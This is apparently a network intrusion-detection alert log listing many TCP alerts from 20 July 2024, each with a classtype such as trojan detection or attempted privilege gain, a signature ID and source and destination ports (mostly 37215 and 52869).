                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.005156
                      SID:2835222
                      Source Port:34400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.481011
                      SID:2831300
                      Source Port:43510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.751196
                      SID:2027339
                      Source Port:47178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:22.606515
                      SID:2831300
                      Source Port:48348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.211007
                      SID:2025132
                      Source Port:46490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.785967
                      SID:2831300
                      Source Port:37182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2829579
                      Source Port:50852
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.776719
                      SID:2831300
                      Source Port:52656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.987411
                      SID:2027339
                      Source Port:32886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2835222
                      Source Port:34208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.093903
                      SID:2829579
                      Source Port:41692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631937
                      SID:2829579
                      Source Port:60474
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.031511
                      SID:2829579
                      Source Port:45100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.006558
                      SID:2027339
                      Source Port:60958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312895
                      SID:2831300
                      Source Port:42770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.547334
                      SID:2831300
                      Source Port:37662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.949637
                      SID:2027339
                      Source Port:35496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.229743
                      SID:2027339
                      Source Port:47964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.560520
                      SID:2831300
                      Source Port:49688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2835222
                      Source Port:56198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.799089
                      SID:2831300
                      Source Port:53122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.783122
                      SID:2027339
                      Source Port:42202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2835222
                      Source Port:32868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.202325
                      SID:2829579
                      Source Port:40830
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334934
                      SID:2835222
                      Source Port:52590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.859884
                      SID:2025132
                      Source Port:49438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221338
                      SID:2835222
                      Source Port:59124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.458734
                      SID:2025132
                      Source Port:41034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.810641
                      SID:2025132
                      Source Port:59764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.478928
                      SID:2027339
                      Source Port:36668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2829579
                      Source Port:39466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572556
                      SID:2831300
                      Source Port:53584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.774505
                      SID:2831300
                      Source Port:53844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.855159
                      SID:2027339
                      Source Port:34610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113055
                      SID:2829579
                      Source Port:40466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.113390
                      SID:2835222
                      Source Port:59466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.811098
                      SID:2027339
                      Source Port:38390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.105395
                      SID:2835222
                      Source Port:49060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.556960
                      SID:2025132
                      Source Port:55908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.228795
                      SID:2027339
                      Source Port:39798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.068033
                      SID:2027339
                      Source Port:39446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.631864
                      SID:2027339
                      Source Port:49044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.260372
                      SID:2025132
                      Source Port:49634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2829579
                      Source Port:44104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.720788
                      SID:2027339
                      Source Port:50706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.549758
                      SID:2025132
                      Source Port:50824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.104633
                      SID:2831300
                      Source Port:58656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.062277
                      SID:2835222
                      Source Port:44950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.745095
                      SID:2027339
                      Source Port:36580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.018425
                      SID:2829579
                      Source Port:50070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2835222
                      Source Port:45278
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.226478
                      SID:2027339
                      Source Port:51024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2835222
                      Source Port:41418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.549052
                      SID:2025132
                      Source Port:58950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2835222
                      Source Port:48302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2829579
                      Source Port:43122
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.037292
                      SID:2027339
                      Source Port:56686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.922661
                      SID:2831300
                      Source Port:41182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.283253
                      SID:2027339
                      Source Port:37266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.128003
                      SID:2831300
                      Source Port:40278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.752492
                      SID:2027339
                      Source Port:52942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.496780
                      SID:2025132
                      Source Port:53180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:10.141900
                      SID:2025132
                      Source Port:38882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2835222
                      Source Port:48670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.020186
                      SID:2027339
                      Source Port:58968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.756265
                      SID:2831300
                      Source Port:59170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.272048
                      SID:2025132
                      Source Port:42216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.638879
                      SID:2027339
                      Source Port:36752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.717611
                      SID:2831300
                      Source Port:56282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.780168
                      SID:2025132
                      Source Port:41356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.412594
                      SID:2025132
                      Source Port:47728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2829579
                      Source Port:32936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.619597
                      SID:2831300
                      Source Port:34266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.881852
                      SID:2025132
                      Source Port:47792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.075288
                      SID:2025132
                      Source Port:41624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.045144
                      SID:2835222
                      Source Port:51684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097135
                      SID:2829579
                      Source Port:55036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.155095
                      SID:2027339
                      Source Port:50178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.012815
                      SID:2027339
                      Source Port:41020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.968238
                      SID:2027339
                      Source Port:50916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.185032
                      SID:2829579
                      Source Port:60908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.826234
                      SID:2027339
                      Source Port:36994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.770014
                      SID:2025132
                      Source Port:56962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.062116
                      SID:2025132
                      Source Port:33920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.258403
                      SID:2027339
                      Source Port:41176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.060540
                      SID:2025132
                      Source Port:45630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.632574
                      SID:2831300
                      Source Port:41520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.022763
                      SID:2829579
                      Source Port:57968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2829579
                      Source Port:47260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.664090
                      SID:2027339
                      Source Port:58386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.393178
                      SID:2025132
                      Source Port:37356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.001980
                      SID:2025132
                      Source Port:40936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.582150
                      SID:2027339
                      Source Port:50248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.192248
                      SID:2025132
                      Source Port:60782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.469869
                      SID:2025132
                      Source Port:53226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.443835
                      SID:2027339
                      Source Port:52384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.991545
                      SID:2027339
                      Source Port:48104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.668802
                      SID:2027339
                      Source Port:37334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.791090
                      SID:2027339
                      Source Port:44728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.218458
                      SID:2829579
                      Source Port:51490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.135090
                      SID:2027339
                      Source Port:45490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:17.128771
                      SID:2027339
                      Source Port:55714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.292118
                      SID:2831300
                      Source Port:58552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.432917
                      SID:2025132
                      Source Port:36590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.256493
                      SID:2027339
                      Source Port:38542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.599458
                      SID:2027339
                      Source Port:37604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.053180
                      SID:2025132
                      Source Port:51216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2835222
                      Source Port:37116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.251070
                      SID:2027339
                      Source Port:37010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.726021
                      SID:2027339
                      Source Port:41158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.978142
                      SID:2829579
                      Source Port:58734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.374543
                      SID:2025132
                      Source Port:54338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.607934
                      SID:2025132
                      Source Port:51514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.275988
                      SID:2025132
                      Source Port:48426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.299793
                      SID:2027339
                      Source Port:45716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.066716
                      SID:2831300
                      Source Port:44782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.850516
                      SID:2027339
                      Source Port:56446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.460651
                      SID:2027339
                      Source Port:39324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.574948
                      SID:2027339
                      Source Port:46830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.392528
                      SID:2025132
                      Source Port:53270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.062666
                      SID:2835222
                      Source Port:48206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.328792
                      SID:2025132
                      Source Port:50676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.924853
                      SID:2027339
                      Source Port:39902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.131564
                      SID:2025132
                      Source Port:51436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.135557
                      SID:2027339
                      Source Port:53152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806645
                      SID:2831300
                      Source Port:40026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.630356
                      SID:2027339
                      Source Port:56840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2835222
                      Source Port:54338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2835222
                      Source Port:34808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222207
                      SID:2829579
                      Source Port:34718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.535939
                      SID:2025132
                      Source Port:53784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.242138
                      SID:2831300
                      Source Port:47118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.727936
                      SID:2025132
                      Source Port:43048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.827400
                      SID:2831300
                      Source Port:41062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.297792
                      SID:2025132
                      Source Port:54704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.684499
                      SID:2831300
                      Source Port:45804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.578116
                      SID:2027339
                      Source Port:33938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2829579
                      Source Port:41132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2829579
                      Source Port:43708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.500918
                      SID:2025132
                      Source Port:39794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.203681
                      SID:2025132
                      Source Port:39616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.692050
                      SID:2027339
                      Source Port:42114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.826575
                      SID:2831300
                      Source Port:47194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.357099
                      SID:2831300
                      Source Port:53044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.043964
                      SID:2835222
                      Source Port:48498
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.947642
                      SID:2831300
                      Source Port:56402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:01.280564
                      SID:2027339
                      Source Port:41996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.945733
                      SID:2027339
                      Source Port:51978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.040108
                      SID:2831300
                      Source Port:60648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.923449
                      SID:2025132
                      Source Port:38996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.910590
                      SID:2831300
                      Source Port:46702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.363756
                      SID:2027339
                      Source Port:45268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.597662
                      SID:2831300
                      Source Port:50536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.868779
                      SID:2027339
                      Source Port:43666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.340201
                      SID:2025132
                      Source Port:56924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2835222
                      Source Port:37938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.157005
                      SID:2027339
                      Source Port:44414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.212553
                      SID:2835222
                      Source Port:40552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.565610
                      SID:2831300
                      Source Port:50034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.320679
                      SID:2831300
                      Source Port:50886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.474539
                      SID:2025132
                      Source Port:49394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.592736
                      SID:2027339
                      Source Port:35520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.996056
                      SID:2835222
                      Source Port:56356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.158533
                      SID:2027339
                      Source Port:54570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2829579
                      Source Port:59666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.437265
                      SID:2831300
                      Source Port:56658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.514415
                      SID:2831300
                      Source Port:40638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2835222
                      Source Port:34864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.763630
                      SID:2027339
                      Source Port:36860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.314147
                      SID:2831300
                      Source Port:58588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.755930
                      SID:2027339
                      Source Port:44056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2835222
                      Source Port:50358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.621319
                      SID:2027339
                      Source Port:49808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.838946
                      SID:2831300
                      Source Port:47026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.634900
                      SID:2831300
                      Source Port:48196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.105161
                      SID:2027339
                      Source Port:40332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045144
                      SID:2835222
                      Source Port:40918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.320679
                      SID:2027339
                      Source Port:57774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2829579
                      Source Port:52556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.517854
                      SID:2025132
                      Source Port:58038
